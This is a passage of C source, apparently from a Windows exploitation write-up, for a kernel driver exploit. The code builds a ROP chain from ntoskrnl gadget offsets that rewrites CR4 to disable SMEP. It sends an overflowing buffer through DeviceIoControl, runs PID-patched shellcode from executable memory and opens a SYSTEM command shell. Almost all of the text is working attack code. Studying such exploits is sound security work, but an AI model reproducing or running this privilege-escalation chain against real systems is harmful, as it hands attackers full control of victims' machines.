        printf("[-] Error device open %d\n", GetLastError());
        exit(1);
    }
    printf("[+] Success device open\n");

    // Allocate executable memory
    BYTE* shellcode = (BYTE*)VirtualAlloc(NULL, sizeof(shellcode_), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(shellcode, shellcode_, sizeof(shellcode_));
    memcpy(shellcode + 54, &pid, sizeof(pid));              // Change the pid of the shellcode

    INT64 disable_SMEP = 0x250ef8;                          // cr4 value, disable SMEP
    INT64 enable_SMEP = 0x350ef8;                           // cr4 value, enable SMEP
    INT64 pop_rcx = ntoskrnl + 0x314f03;                    // pop rcx; ret
    INT64 mov_cr4 = ntoskrnl + 0x9a4217;                    // mov cr4, rcx; ret
    INT64 wbinvd = ntoskrnl + 0x37fb50;                     // wbinvd; ret
    INT64 ret = pop_rcx + 1;                                // ret

    printf("[+] SMEP disabled\n");

    BYTE input[136] = { 0, };
    memset(input, 0x90, 72);                        // dummy
    memcpy(input + 72, &pop_rcx, 8);                // pop rcx
    memcpy(input + 80, &disable_SMEP, 8);           // disable SMEP value
    memcpy(input + 88, &mov_cr4, 8);                // mov cr4, rcx
    memcpy(input + 96, &wbinvd, 8);                 // wbinvd; ret
    memcpy(input + 104, &shellcode, 8);             // shellcode
    memcpy(input + 112, &mov_cr4, 8);               // mov cr4, rcx 
    memcpy(input + 120, &ret, 8);                   // restore rsp(stack)
    memcpy(input + 128, &ret, 8);                   // restore rsp(stack)

    DWORD temp;
    if (!DeviceIoControl(hDevice, IOCTL_CODE, input, sizeof(input), NULL, 0, &temp, NULL)) {
        printf("[-] Failed DeviceIoControl %d\n", GetLastError());
        exit(1);
    }

    printf("[+] SMEP enabled\n");
    printf("[+] Sucesss execute shellcode\n");
    printf("[+] Success Get SYSTEM shell\n");
    printf("\n\n");
    system("cmd");
}

int main() {
    exploit();
    return 0;
}

Tag

#windows